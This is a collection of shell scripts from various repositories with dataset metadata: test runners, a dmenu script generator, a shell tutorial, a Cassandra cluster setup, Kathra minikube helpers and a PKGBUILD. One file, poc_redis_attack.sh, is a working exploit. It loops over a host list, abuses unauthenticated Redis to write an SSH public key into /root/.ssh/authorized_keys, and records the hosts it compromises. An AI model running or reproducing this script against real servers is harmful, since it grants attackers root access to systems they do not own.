elif [[ $run_unit_test == true && $CREATE_BASELINE == false ]]; then
for i in $unit_test_cases; do
case $i in
std)
ut_compile_cases+=" 1$i"
ut_run_cases+=" 1$i"
;;
thread)
ut_compile_cases+=" 1std"
ut_run_cases+=" 2$i"
;;
mpi)
ut_compile_cases+=" 1std"
ut_run_cases+=" 3$i"
;;
decomp)
ut_compile_cases+=" 1std"
ut_run_cases+=" 4$i"
;;
restart)
ut_compile_cases+=" 1std"
ut_run_cases+=" 5$i"
;;
32bit)
ut_compile_cases+=" 2$i"
ut_run_cases+=" 6$i"
;;
debug)
ut_compile_cases+=" 3$i"
ut_run_cases+=" 7$i"
;;
esac
done
fi
ut_compile_cases=$(echo $ut_compile_cases | tr " " "\n" | sort -u)
ut_compile_cases=$(echo $ut_compile_cases | sed -e 's/^[0-9]//g' -e 's/ [0-9]/ /g')
ut_run_cases=$(echo $ut_run_cases | tr " " "\n" | sort -u)
ut_run_cases=$(echo $ut_run_cases | sed -e 's/^[0-9]//g' -e 's/ [0-9]/ /g')
if [[ ! $ut_run_cases =~ ^std && $ut_run_cases =~ restart ]]; then
ut_run_cases="std ${ut_run_cases}"
fi
echo "ut_compile_cases are $ut_compile_cases"
echo "ut_run_cases are $ut_run_cases"
########################################################################
#### COMPILE ####
########################################################################
# build_file specifies compilation options
build_file='utest.bld'
[[ -f ${build_file} ]] || error "${build_file} does not exist"
compile_log=${PATHRT}/Compile_ut_$MACHINE_ID.log
rm -f fv3_*.exe modules.fv3_* ${compile_log}
while IFS="|" read model comp_opt; do
model_found=false
model=$(echo $model | sed -e 's/^ *//' -e 's/ *$//')
comp_opt=$(echo $comp_opt | sed -e 's/^ *//' -e 's/ *$//')
if [[ $model == ${TEST_NAME} ]]; then
base_opt=${comp_opt}
model_found=true
break
fi
done < ${build_file}
if [[ ${model_found} == false ]]; then
error "Build options for $TEST_NAME not found. Please edit utest.bld."
fi
for name in $ut_compile_cases; do
case $name in
std)
NEMS_VER=${base_opt}
;;
32bit)
if [[ ${base_opt} =~ "32BIT=Y" ]]; then
NEMS_VER=$(echo ${base_opt} | sed -e 's/32BIT=Y/32BIT=N/')
elif [[ ${base_opt} =~ "32BIT=N" ]]; then
NEMS_VER=$(echo ${base_opt} | sed -e 's/32BIT=N/32BIT=Y/')
else
NEMS_VER="${base_opt} 32BIT=Y"
fi
;;
debug)
NEMS_VER="${base_opt} 32BIT=Y DEBUG=Y"
;;
esac
NEMS_VER=$(echo ${NEMS_VER} | sed -e 's/^ *//' -e 's/ *$//')
echo "compile case: $name"
echo "NEMS_VER: $NEMS_VER"
./compile.sh $PATHTR/FV3 $MACHINE_ID "${NEMS_VER}" $name >${LOG_DIR}/compile_${TEST_NAME}_$name.log 2>&1
echo "bash compile is done for ${model} ${name} with ${NEMS_VER}"
done
########################################################################
#### RUN ####
########################################################################
mkdir -p ${STMP}/${USER}
NEW_BASELINE=${STMP}/${USER}/FV3_UT/UNIT_TEST
RTPWD=$DISKNM/NEMSfv3gfs/develop-20191230
if [[ $CREATE_BASELINE == true ]]; then
rm -rf $NEW_BASELINE
mkdir -p $NEW_BASELINE
rsync -a "${RTPWD}"/FV3_* "${NEW_BASELINE}"/
rsync -a "${RTPWD}"/WW3_* "${NEW_BASELINE}"/
fi
# Directory where all simulations are run
RUNDIR_ROOT=${RUNDIR_ROOT:-${PTMP}/${USER}}/FV3_UT/ut_$$
mkdir -p ${RUNDIR_ROOT}
# unittest_log is different from REGRESSIONTEST_LOG
# defined in run_test.sh and passed onto rt_utils.sh
unittest_log=${PATHRT}/UnitTests_$MACHINE_ID.log
rm -f fail_test ${unittest_log}
if [[ $CREATE_BASELINE == true && $run_unit_test == true ]]; then
# Run to create baseline
ut_run_cases='std 32bit debug'
run_utests
rm -rf ${RUNDIR_ROOT}/*
rm -f ${LOG_DIR}/run_* ${LOG_DIR}/rt_*
# Run to compare with baseline
ut_run_cases='std thread mpi decomp restart 32bit debug'
CREATE_BASELINE=false
RTPWD=${NEW_BASELINE}
run_utests
elif [[ $CREATE_BASELINE == true && $run_unit_test == false ]]; then
# Run to create baselind
run_utests
elif [[ $CREATE_BASELINE == false && $run_unit_test == true ]]; then
# Run to compare with baseline
if [[ ! -d $NEW_BASELINE ]]; then
error "There is no baseline to run unit tests against. Create baselines first."
fi
RTPWD=${NEW_BASELINE}
run_utests
fi
########################################################################
#### UNIT TEST STATUS ####
########################################################################
set +e
cat ${LOG_DIR}/compile_*.log > ${compile_log}
cat ${LOG_DIR}/rt_*.log >> ${unittest_log}
if [[ -e fail_test ]]; then
echo "FAILED TESTS: " | tee -a ${unittest_log}
while read -r failed_test_name
do
echo "Test ${failed_test_name} failed " | tee -a ${unittest_log}
done < fail_test
echo "UNIT TEST FAILED" | tee -a ${unittest_log}
else
echo "UNIT TEST WAS SUCCESSFUL" | tee -a ${unittest_log}
rm -f fv3_*.x fv3_*.exe modules.fv3_*
[[ ${keep_rundir} == false ]] && rm -rf ${RUNDIR_ROOT}
fi
date >> ${unittest_log}
elapsed_time=$(printf '%02dh:%02dm:%02ds\n' $(($SECONDS%86400/3600)) $(($SECONDS%3600/60)) $(($SECONDS%60)))
echo "Elapsed time: ${elapsed_time}. Have a nice day!" || tee -a ${unittest_log}
| true
|
a839d981c2dcfd09733741191f6f81098d57a637
|
Shell
|
yashaka/python-web-test
|
/run/pull_docker_images_for_selenoid_browsers.sh
|
UTF-8
| 597
| 3.03125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
awk -F'"' '$0 ~ /selenoid/ {print $4}' etc/selenoid/browsers.json | while read -r image ; do docker pull "$image" ; done
# | |
# use " as column separator |
# each line in a file---------this file (browsers.json)
# if matches selenoid in text
# print 4th column
# pipe everything to next command (docker pull)
# where everything are images parsed in previous step
| true
|
f457d5cd6804ed8fc2d26bfd2d3a0d6d217dc2fd
|
Shell
|
DaleNaci/Tutorials
|
/ShellScript/myscript.sh
|
UTF-8
| 625
| 3.875
| 4
|
[] |
no_license
|
#! /bin/bash
# ECHO COMMAND
echo Hello World!
# VARIABLE
# Uppercase by convention
# Letters, numbers, underscores
NAME="Brad"
echo "My name is ${NAME}"
# USER INPUT
read -p "Enter your name: " NAME
echo "Hello ${NAME}, nice to meet you!"
# SIMPLE IF STATEMENT
if [ "$NAME" == "Brad" ]
then
echo "Your name is Brad"
fi
# IF-ELSE
if [ "$NAME" == "Brad" ]
then
echo "Your name is Brad"
else
echo "Your name is not Brad"
fi
# ELSE-IF (elif)
if [ "$NAME" == "Brad" ]
then
echo "Your name is Brad"
elif [ "$NAME" == "Jack" ]
then
echo "Your name is Jack"
else
echo "Your name is not Brad or Jack"
fi
| true
|
7ea1cf41fdc88df239ae0af592335a21e211bea5
|
Shell
|
mansi-k/SSD_Assignment1
|
/q10.sh
|
UTF-8
| 231
| 3.5
| 4
|
[] |
no_license
|
#!/bin/bash
read opt
read n
read res
b=1
while [ $n -gt 1 ]
do
read b
res=`echo "$res $opt $b" | bc -l`
n=`expr $n - 1`
done
if [[ $opt == "/" ]]
then
printf "%0.4f\n" "$res"
else
echo $res | sed 's/\\ //g'
fi
| true
|
4c09085b283bf5c880657321502893e7b8a9a433
|
Shell
|
Derevi/dwm-suckless-scripts
|
/dmenu-custom-command-generator
|
UTF-8
| 4,142
| 4.40625
| 4
|
[] |
no_license
|
#!/bin/bash
# WHAT THIS DOES: this script will generate a custom dmenu that will display user defined options and upon selection will run some command.
# it is great for categorizing commonly used commands. Example, I use this for poweroff,reboot,lock,suspend.
# this is an example of generating a custom dmenu command that will show power options:
#./this-script "power" "choose power option" "poweroff" "systemctl poweroff" "reboot" "systemctl reboot" "lock" "light-locker-command -l" "suspend" "systemctl suspend"
# in addition to creating generating a script it will also create a symlink of the script so that it is easier to call
# USAGE NOTES
# !! you should probably change the value of the variable OUTPUT to a path of your choosing.. also probably might be helpful to change the path of the ln -s command near the end.
# ON THE FIRST PARAMETER $1:
# first parameter $1 is always the name of the file which dmenu will display, this script will generate an symlink with
# the filename prefixed by "dmenu-" ex. if we use file name "some-command" the symlink will be named "dmenu-some-command"
# the symlink is placed in /usr/local/bin
# ON THE SECOND PARAMETER $2:
# the second parameter is the string in which dmenu will prompt when asking for the selection
# ALL OTHERS:
# parameters (greater than 2) are ALWAYS entered as a pair where the first parameter is the label to be selected in dmenu
# the next consecutive parameter is ALWAYS the command that will be run for that respective label
# example $1="file-manager", $2="file-manager-command", $3="some option in dmenu", $4="command-for-option"
# this implies (for parameters greater than 2) all odd numbered parameters are the dmenu selection label and all even numbered parameters are the respective commands
# PS. I realize this is messy, and not optimal, im not a pro in bash and just wanted write something quick and simple. I probably wont refactor because I'd rather
# be doing something else. If you want to refactor and make it more elegant as opposed to the functional slop, go for it, let me know I can update this too.
# I apologize in advance for the inconsistent use of printf and echo. it just works this way so meh.
# generates dmenu selection
counter=1
dmenu_selection=""
OUTPUT="/home/$(whoami)/.config/dmenu/custom-dmenu/" ## EDIT this to whatever filepath you want
for parameter in "$@"
do
parameter=$(echo "$parameter")
if [ $counter -eq 1 ]; then # initial file setup once the loop reads the file name param
FILENAME=$parameter
OUTPUT+=$parameter
touch $OUTPUT
echo -e "$OUTPUT"
printf %s "#!/bin/bash" >> $OUTPUT
echo -e "\n\n# command auto generated by custome-dmenu-generator.sh\n\n" >> $OUTPUT
echo -e "get_selection () {" >> $OUTPUT
printf %s "echo -e \"" >> $OUTPUT
elif [ $counter -eq 2 ]; then # save the second parameter whcih is the dmenu prompt to be used later
dmenu_prompt=$parameter
elif [ $(($# - 1)) -eq $counter ]; then #if last option do not append with \n"
printf "$parameter" >> $OUTPUT
elif [ $(( $counter % 2 )) -ne 0 ]; then # write option and append with \n"
echo "im the dmenu label $parameter at $counter"
printf "$parameter" >> $OUTPUT
printf %s "\n" >> $OUTPUT
fi
counter=$((counter+1));
done
echo -e "\" | dmenu -p \"$dmenu_prompt\"\n}" >> $OUTPUT # complete dmenu options prompt
# generate conditional command selection
counter=1
echo -e "\n\nselection=\$(get_selection)" >> $OUTPUT
for parameter in "$@"
do
parameter=$(echo "$parameter")
if [ $counter -gt 2 ];then
if [ $counter -eq 3 ]; then
echo -e "if [ \"\$selection\" == \"$parameter\" ]; then" >> $OUTPUT
elif [ $(( $counter % 2 )) -ne 0 ]; then
echo -e "elif [ \"\$selection\" == \"$parameter\" ]; then" >> $OUTPUT
else
echo -e " $parameter" >> $OUTPUT
fi
fi
counter=$((counter+1));
done
echo "fi" >> $OUTPUT
#get_selection_function=$(printf %s "echo -e \"$dmenu_selection\" | dmenu -p \"$dmenu_prompt\"\\n}")
#printf "$get_selection_function" >> $OUTPUT
chmod +x $OUTPUT
sym_link
ln -s $OUTPUT /usr/local/bin/dmenu-$FILENAME ## EDIT this to whatever you want
echo -e "the file $OUTPUT has been created its contents are:"
cat $OUTPUT
| true
|
d3d4ceddeced8c05a8b6d9122351bc33ea652aec
|
Shell
|
singleghost/redis-database-POC
|
/poc_redis_attack.sh
|
UTF-8
| 474
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
read -p "enter the filename which contains urls\n" urlfile
cat $urlfile | while read line
do
cat foo.txt |redis-cli -h $line -x set crackit \
&& redis-cli -h $line config set dir /root/.ssh/ |grep OK \
&& redis-cli -h $line config get dir|grep '/root/.ssh' \
&& redis-cli -h $line config set dbfilename \
"authorized_keys" | grep OK && redis-cli -h $line save \
| grep OK && echo "$line is OK" && echo $line >> vul_host.lst
done
echo "program exit"
| true
|
483bcaacbbd1eb90fe85c681802cf0456d7cb1f5
|
Shell
|
brandonpaiz/dots
|
/scripts/,repeat-every
|
UTF-8
| 199
| 3.578125
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
sleep_error_msg() {
echo "$0: invalid time interval '$1'"
}
sleep_time="$1"
shift 1
while true
do
"$@"
sleep "$sleep_time" &>/dev/null || { sleep_error_msg "$@" && exit 1; }
done
| true
|
69a17c40959c9329b7cfcb2eda11e5a314f83375
|
Shell
|
mischief/9problems
|
/sys/src/games/music/juke.rc
|
UTF-8
| 1,147
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/rc
rfork e
wide=`{echo $vgasize | sed 's/(.*)x.*x.*/\1 > 240/' | hoc}
debug=0
tflag=''
wflag=''
host=''
flags=()
sname=$user
if (! ~ $wide 1) {
flags=($flags -t)
}
while(! ~ $#* 0) {
switch ($1) {
case -d
debug=$2
shift
case -t
tflag='-t'
case -h
host=$2
shift
case -w
wflags='-w'
case -s
sname=$2
shift
case -*
echo Usage: classical [-d level] [-t] [-h srvhost]
exit usage
}
shift
}
if (! test -f /mnt/playlist) {
if (! ~ $debug '0') echo mounting playlistfs
if (! test -e /srv/playlist.$sname && ! ~ $host ''){
import -a $host /srv /srv
}
if (! mount -b /srv/playlist.$sname /mnt >/dev/null >[2]/dev/null){
rm -f /srv/playlist.$sname
if (! ~ $debug '0') echo starting playlistfs
games/playlistfs -s $sname -d $debug
}
}
if (~ `{ls /mnt/juke >[2]/dev/null | sed '1q'} '') {
if (! test -e /srv/jukefs.$sname && ! ~ $host ''){
import -a $host /srv /srv
}
if (! mount -b /srv/jukefs.$sname /mnt >/dev/null >[2]/dev/null){
if (! ~ $debug '0') echo games/jukefs
games/jukefs -s $sname
}
}
if (~ $wflags '-w') {
exec games/jukebox -w -d $debug $tflag &
}
exec games/jukebox -d $debug $tflag
| true
|
a4dabf817a17b39fd8fa3a36224e758adaec7633
|
Shell
|
yochananmarqos/pkgbuilds
|
/mangl-git/PKGBUILD
|
UTF-8
| 1,396
| 2.6875
| 3
|
[] |
no_license
|
# https://aur.archlinux.org/packages/mangl-git
groups=('modified')
pkgname=mangl-git
pkgver=1.1.2.r1.g1957140
pkgrel=1
pkgdesc="Graphical man page viewer"
arch=('x86_64')
url="https://github.com/zigalenarcic/mangl"
license=('BSD')
depends=('freetype2' 'glfw' 'libglvnd')
makedepends=('git')
makedepends+=('glfw-x11')
#makedepends+=('glfw-wayland')
optdepends=('fontconfig: set custom font')
provides=("${pkgname%-git}")
conflicts=("${pkgname%-git}")
source=('git+https://github.com/zigalenarcic/mangl.git'
"${pkgname%-git}.desktop"
'manglrc_example')
sha256sums=('SKIP'
'370e454df24a2bf0bf185988d92083c0ec5bd72548a5fba9c44867e76a1d8d91'
'527eb963486647d759f3884beff0acb24424a93b02d285008d475bcb26534e80')
pkgver() {
cd "$srcdir/${pkgname%-git}"
git describe --long --tags | sed 's/^v//;s/\([^-]*-g\)/r\1/;s/-/./g'
}
build() {
cd "$srcdir/${pkgname%-git}"
./configure
make
}
package() {
cd "$srcdir/${pkgname%-git}"
# make PREFIX=/usr DESTDIR="$pkgdir" install
install -Dm755 "${pkgname%-git}" -t "$pkgdir/usr/bin/"
install -Dm644 "${pkgname%-git}.1" -t "$pkgdir/usr/share/man/man1/"
install -Dm644 "$srcdir/${pkgname%-git}.desktop" -t "$pkgdir/usr/share/applications/"
install -Dm644 "$srcdir/manglrc_example" -t "$pkgdir/usr/share/doc/${pkgname%-git}/"
install -Dm644 LICENSE -t "$pkgdir/usr/share/licenses/${pkgname%-git}/"
}
| true
|
d231865bf7333768171a71c1f1096d1197444910
|
Shell
|
gperciva/lilypond-extra
|
/stats/make-stats.sh
|
UTF-8
| 913
| 3.234375
| 3
|
[] |
no_license
|
#!/bin/sh
TMPDIR=~/tmp/
GITSTATS=~/src/gitstats/gitstats
ONE_YEAR=$TMPDIR/stats-1year/
THREE_MONTHS=$TMPDIR/stats-3months/
ALL=$TMPDIR/stats-all/
SERVER_ONE_YEAR=graham@lilypond.org:public_html/gitstats-1year/
SERVER_THREE_MONTHS=graham@lilypond.org:public_html/gitstats-3months/
SERVER_ALL=graham@lilypond.org:public_html/gitstats-all/
mkdir -p $ONE_YEAR
mkdir -p $THREE_MONTHS
mkdir -p $ALL
cd $LILYPOND_GIT
$GITSTATS \
-c commit_begin=`git rev-list -1 --until="1 year ago" origin` \
$LILYPOND_GIT $ONE_YEAR
cd $ONE_YEAR
ln -s authors.html AUTHORS.html
rsync -a $ONE_YEAR/* $SERVER_ONE_YEAR/
cd $LILYPOND_GIT
$GITSTATS \
-c commit_begin=`git rev-list -1 --until="3 months ago" origin` \
$LILYPOND_GIT $THREE_MONTHS
cd $THREE_MONTHS
ln -s authors.html AUTHORS.html
rsync -a $THREE_MONTHS/* $SERVER_THREE_MONTHS/
cd $LILYPOND_GIT
$GITSTATS \
$LILYPOND_GIT $ALL
cd $ALL
ln -s authors.html AUTHORS.html
rsync -a $ALL/* $SERVER_ALL/
| true
|
1bbe22d01e3c6bbd0d2d24fb48cf19d6d54702ad
|
Shell
|
bestofmukul/aquabot
|
/build.sh
|
UTF-8
| 131
| 2.953125
| 3
|
[] |
no_license
|
#!/bin/bash
if [[ -z $1 ]]; then
echo "Please provide a path to build"
exit 1
fi
GOARM=7 GOARCH=arm GOOS=linux go build $1
| true
|
ad7eab946c15eb6df7cfb46cb1bba745a8da2ed9
|
Shell
|
aiotter/dotfiles
|
/bin/makedoc
|
UTF-8
| 413
| 2.609375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
make -f <(cat << END-OF-MAKEFILE
%.pdf: %.adoc
asciidoctor-pdf -r asciidoctor-pdf-cjk --out-file $@ $<
%.docx: %.adoc custom-reference.docx
asciidoctor --backend docbook --out-file - $< | pandoc --from docbook --to docx --reference-doc=custom-reference.docx --output $@
custom-reference.docx:
pandoc --print-default-data-file reference.docx > custom-reference.docx
END-OF-MAKEFILE
) $@
| true
|
36b9b9eb4fc76a199431941742c1106805722e36
|
Shell
|
phisikus/hecuba
|
/cluster/createNodeDirs.sh
|
UTF-8
| 1,090
| 3.9375
| 4
|
[] |
no_license
|
#!/bin/bash
if [ ! -d apache-cassandra ]
then
echo "apache-cassandra directory is missing"
exit -1
fi
if [ $# -lt 1 ]
then
echo "use number of nodes as argument"
exit -1
fi
if [ $1 -lt 1 ]
then
echo "use a number greater than 0"
exit -1
fi
numberOfNodes=$1
rm -fr nodes
mkdir nodes
seeds="192.168.43.10"
for ((k=1; k<numberOfNodes; k++))
do
seeds=$seeds",192.168.43.$(($k+10))"
done
echo "I will create $numberOfNodes nodes..."
for ((i=0; i<numberOfNodes; i++))
do
mkdir -p nodes/node_$i/apache-cassandra/
for j in ./apache-cassandra/*
do
ln -s ../../../$j ./nodes/node_$i/$j
done
rm ./nodes/node_$i/apache-cassandra/conf
rm ./nodes/node_$i/apache-cassandra/data
mkdir ./nodes/node_$i/apache-cassandra/data
cp -r ./apache-cassandra/conf ./nodes/node_$i/apache-cassandra/
cat ./apache-cassandra/conf/cassandra.yaml | sed \
-e "s/Test Cluster/HecubaCluster/g" \
-e "s/127.0.0.1/$seeds/g" \
-e "s/localhost/192.168.43.$(($i+10))/g" > ./nodes/node_$i/apache-cassandra/conf/cassandra.yaml
echo "Created directory and configuration for node $i"
done
echo "Done."
| true
|
e2c1d73df24313394c25b42b6840c9078dff8ee8
|
Shell
|
kathra-project/deployment
|
/terraform/terraform_modules/minikube-stack/sh/functions.sh
|
UTF-8
| 14,034
| 3.375
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
[ "$tmp" == "" ] && export tmp=/tmp/kathra.minikube.wrapper
[ ! -d $tmp ] && mkdir $tmp
function startMinikube() {
printDebug "startMinikube(minikubeCpus: $minikubeCpus, minikubeMemory: $minikubeMemory, minikubeDiskSize: $minikubeDiskSize)"
downloadMinikube
installKubectl
[ $(minikube status | grep -e "host: Running\|kubelet: Running\|apiserver: Running\|kubectl: Correctly Configured\|kubeconfig: Configured" | wc -l) -eq 4 ] && minikube addons enable ingress && printInfo "Minikube already started" && return 0
if [ "$minikubeVmDriver" == "none" ]
then
$sudo minikube start --vm-driver="none" --kubernetes-version v$kubernetesVersion || printErrorAndExit "Unable to install minikube"
rm -Rf $HOME/.minikube $HOME/.kube
$sudo mv /root/.kube /root/.minikube $HOME
$sudo chown -R $USER $HOME/.kube $HOME/.minikube
sudo chown -R $USER /etc/kubernetes
sed -i "s#/root/#${HOME}/#g" $HOME/.kube/config
else
minikube start --vm-driver=$minikubeVmDriver --cpus $minikubeCpus --memory $minikubeMemory --disk-size $minikubeDiskSize --kubernetes-version v$kubernetesVersion || printErrorAndExit "Unable to install minikube"
fi
printInfo "Minikubed started"
minikube addons enable ingress || printErrorAndExit "Unable to enable ingress"
addDefaultCertNginxController "kathra-services" "default-tls" || printErrorAndExit "Unable to Configure Nginx"
return 0
}
export -f startMinikube
function getLocalIp() {
local hostNetworkDevice=$(ip -4 addr show | grep '^[0-9]*:' | awk '{print $2;}' | sed 's/\://g' | grep -v 'lo' | head -n 1)
local ip=$(ip -4 addr show $hostNetworkDevice | grep -oP '(?<=inet\s)[\da-f.]+')
[ "$ip" == "" ] && return 1
echo $ip
}
function addDefaultCertNginxController() {
local namespace=$1
local secretName=$2
kubectl -n kube-system patch deployment nginx-ingress-controller -o json --type "json" -p "[{\"op\":\"add\",\"path\":\"/spec/template/spec/containers/0/args/1\",\"value\":\"--default-ssl-certificate=$namespace/$secretName\"}]"
}
function addLocalIpInCoreDNS() {
printDebug "addLocalIpInCoreDNS(domain: $1)"
[ "$(getLocalIp)" == "" ] && return 1
coreDnsAddRecords $domain "$(getLocalIp)"
}
function getKubeConfig() {
printDebug "getKubeConfig()"
local ca_data=$(kubectl config view --raw -o json | jq -r '.clusters[] | select((.name=="minikube") or (.name=="docker-desktop")) | .cluster."certificate-authority-data"')
if [ "$ca_data" == "null" ]
then
local ca_file=$(kubectl config view --raw -o json | jq -r '.clusters[] | select((.name=="minikube") or (.name=="docker-desktop")) | .cluster."certificate-authority"')
[ ! -f "$ca_file" ] && printErrorAndExit "Unable to find certificate-authority in kubectl config view"
ca_data=$(cat $ca_file | base64 -w0)
fi
local host=$(kubectl config view --raw -o json | jq -r '.clusters[] | select((.name=="minikube") or (.name=="docker-desktop")) | .cluster.server')
local client_cert_data=$(kubectl config view --raw -o json | jq -r '.users[] | select((.name=="minikube") or (.name=="docker-desktop")) | .user."client-certificate-data"')
if [ "$client_cert_data" == "null" ]
then
local client_cert_file=$(kubectl config view --raw -o json | jq -r '.users[] | select((.name=="minikube") or (.name=="docker-desktop")) | .user."client-certificate"')
[ ! -f "$client_cert_file" ] && printErrorAndExit "Unable to find client-certificate in kubectl config view"
client_cert_data=$(cat $client_cert_file | base64 -w0)
fi
local client_key_data=$(kubectl config view --raw -o json | jq -r '.users[] | select((.name=="minikube") or (.name=="docker-desktop")) | .user."client-key-data"')
if [ "$client_key_data" == "null" ]
then
local client_key_file=$(kubectl config view --raw -o json | jq -r '.users[] | select((.name=="minikube") or (.name=="docker-desktop")) | .user."client-key"')
[ ! -f "$client_key_file" ] && printErrorAndExit "Unable to find client-key in kubectl config view"
client_key_data=$(cat $client_key_file | base64 -w0)
fi
echo "{\"cluster_ca_certificate\": \"$(echo $ca_data)\", \"host\":\"$host\", \"client_certificate\":\"$(echo $client_cert_data)\", \"client_key\":\"$(echo $client_key_data)\"}"
}
function checkCommandAndRetry() {
local retrySecondInterval=5
local attempt_counter=0
local max_attempts=100
while true; do
eval "${1}" && return 0
[ ${attempt_counter} -eq ${max_attempts} ] && printError "Check $1, error" && return 1
attempt_counter=$(($attempt_counter+1))
printDebug "Check : $1, attempt ($attempt_counter/$max_attempts), retry in $retrySecondInterval sec."
sleep $retrySecondInterval
done
return 0
}
export -f checkCommandAndRetry
function installKubeDB() {
printDebug "installKubeDB()"
local nameRelease=kubedb-operator
[ ! "$(helm list --output json | jq -r ".Releases[] | select(.Name==\"$nameRelease\")")" == "" ] && printDebug "KubeDB already installed" && return 0
curl -fsSL -o onessl https://github.com/kubepack/onessl/releases/download/0.3.0/onessl-linux-amd64 && chmod +x onessl && sudo mv onessl /usr/local/bin/
helm repo add appscode https://charts.appscode.com/stable/ || printErrorAndExit "Unable add helm repo"
helm repo update || printErrorAndExit "Unable update helm repo"
helm install appscode/kubedb --namespace kubedb --name $nameRelease --version $kubeDbVersion --set apiserver.ca="$(onessl get kube-ca)" --set apiserver.enableValidatingWebhook=true --set apiserver.enableMutatingWebhook=true || printErrorAndExit "Unable install kubedb"
printInfo "KubeDB Installed"
return 0
}
export -f installKubeDB
function forwardPort() {
local portLocal=$1
local hostDist=$2
local portDist=$3
printDebug "forwardPort(portLocal: $portLocal, hostDist: $hostDist, portDist: $portDist)"
! dpkg -s socat > /dev/null && sudo apt-get install -y socat
ps a | grep "socat tcp-l:$portLocal," | grep -v grep | awk '{print $1}' | xargs sudo kill -9 > /dev/null 2> /dev/null
nohup sudo socat tcp-l:$portLocal,fork,reuseaddr tcp:$hostDist:$portDist > /dev/null 2>&1 </dev/null &
printInfo "localhost listen on port $portLocal and redirect to $hostDist:$portDist"
return $?
}
export -f forwardPort
function addEntryHostFile() {
local domain=$1
local ip=$2
printDebug "addEntryHostFile(domain: $domain, ip: $ip)"
sudo grep -v " $domain$" < /etc/hosts > $tmp/addEntryHostFile && sudo cp $tmp/addEntryHostFile /etc/hosts
echo "$ip $domain" | sudo tee -a /etc/hosts
}
export -f addEntryHostFile
function downloadMinikube() {
printDebug "downloadMinikube()"
[ "${minikubeVmDriver}" == "virtualbox" ] && ! dpkg -s virtualbox > /dev/null && sudo apt-get install -y virtualbox
[ "${minikubeVmDriver}" == "none" ] && ! dpkg -s nfs-common > /dev/null && sudo apt-get install -y nfs-common
which minikube > /dev/null 2> /dev/null && return 0
sudo curl -L -o $tmp/minikube https://storage.googleapis.com/minikube/releases/v$minikubeVersion/minikube-linux-amd64
sudo chmod +x $tmp/minikube
sudo mv $tmp/minikube /usr/local/bin/minikube
}
export -f downloadMinikube
function coreDnsAddRecords() {
local domain=$1
local ip=$2
printDebug "coreDnsAddRecords(domain: $domain, ip: $ip)"
## Add or Patch kathra.db into Coredns ConfigMap
kubectl -n kube-system get cm coredns -o json > $tmp/coredns.cm.json
local configMap=$(kubectl -n kube-system get cm coredns -o json | jq -r '.data["kathra.db"]')
[ "$configMap" == "null" ] || kubectl -n kube-system patch configmap coredns --type=json -p='[{"op": "remove", "path": "/data/kathra.db"}]'
kubectl -n kube-system get cm coredns -o json > $tmp/coredns.cm.json
cat > $tmp/kathra.db <<EOF
$domain. IN SOA sns.dns.icann.org. noc.dns.icann.org. 2015082541 7200 3600 1209600 3600
$domain. IN NS b.iana-servers.net.
$domain. IN NS a.iana-servers.net.
$domain. IN A $ip
*.$domain. IN CNAME $domain.
EOF
jq ".data += {\"kathra.db\": \"$(cat $tmp/kathra.db | sed ':a;N;$!ba;s/\n/\n/g')\"}" < $tmp/coredns.cm.json | sed "s/53 {/53 {\\\\n file \/etc\/coredns\/kathra.db $domain /g" > $tmp/coredns.cm.updated.json
kubectl apply -f $tmp/coredns.cm.updated.json || printErrorAndExit "Unable to update coredns configmap: $tmp/coredns.cm.updated.json"
## Mount kathra.db into Coredns Deployment
kubectl -n kube-system get deployment coredns -o json > $tmp/coredns.deployment.json
if [ $(grep "kathra.db" < $tmp/coredns.deployment.json | wc -l) -eq 0 ]
then
jq ".spec.template.spec.volumes[0].configMap.items += [{\"key\": \"kathra.db\", \"path\": \"kathra.db\"}]" < $tmp/coredns.deployment.json > $tmp/coredns.deployment.updated.json
kubectl apply -f $tmp/coredns.deployment.updated.json || printErrorAndExit "Unable to update coredns deployment: $tmp/coredns.deployment.updated.json"
fi
## Force restart pods
kubectl -n kube-system delete pods -l k8s-app=kube-dns
## Test DNS config
printInfo "Check internal DNS $domain -> $ip"
checkCommandAndRetry "kubectl delete pods check-dns ; kubectl run -it --rm --restart=Never --image=infoblox/dnstools:latest check-dns -- '-c' \"host $domain\" | tee | grep \"$domain has address $ip\" > /dev/null" || printErrorAndExit "Unable to run pod dnstools and check hostname"
printInfo "CoreDNS Configured"
return 0
}
export -f coreDnsAddRecords
function configureDefaultCertificate() {
local tlsFullChainFile=$1
local tlsKeyFile=$2
printDebug "configureDefaultCertificate(tlsFullChainFile: $tlsFullChainFile, tlsKeyFile: $tlsKeyFile)"
kubectl -n traefik patch secrets traefik-default-cert -p "{\"data\": {\"tls.crt\":\"$(sudo cat $tlsFullChainFile | base64 -w0)\",\"tls.key\":\"$(sudo cat $tlsKeyFile | base64 -w0)\"}}" || printErrorAndExit "Unable to patch secrets 'traefik-default-cert' "
printInfo "Traefik default certificate updated from files (fullchain: $tlsFullChainFile, key:$tlsKeyFile)"
kubectl -n traefik delete pods --all > /dev/null 2> /dev/null
return 0
}
export -f configureDefaultCertificate
function generateCertsDnsChallenge() {
printDebug "generateCertsDnsChallenge(domain: $1, tlsCertOut: $2, tlsKeyOut: $3)"
local domain=$1
local tlsCertOut=$2
local tlsKeyOut=$3
local email=contact@$domain
local directoryName=$(sudo ls -l /etc/letsencrypt/archive/ | awk '{print $9}' | grep -E "$domain(-[0-9]+)*" | tail -n 1)
if [ ! $directoryName == "" ]
then
local certDir=/etc/letsencrypt/live/$directoryName
export tlsCert=$certDir/fullchain.pem
export tlsKey=$certDir/privkey.pem
sudo ls -l $tlsCert > /dev/null 2> /dev/null && sudo ls -l $tlsKey > /dev/null 2> /dev/null && printInfo "Certificate already exists: $tlsCert, $tlsKey" && sudo cp $tlsCert $tlsCertOut && sudo cp $tlsKey $tlsKeyOut && sudo chown $USER $tlsKeyOut && sudo chown $USER $tlsCertOut && return 0
fi
printInfo "Generate new wildcard certificate for domain *.$domain with Let's Encrypt"
! dpkg -s python-minimal > /dev/null && sudo apt-get install -y python-minimal
! dpkg -s letsencrypt > /dev/null && sudo apt-get install -y letsencrypt
! dpkg -s git-core > /dev/null && sudo apt-get install -y git-core
[ -d /opt/certbot ] && sudo rm -Rf /opt/certbot
cd /opt && sudo git clone https://github.com/certbot/certbot.git && cd certbot && ./certbot-auto
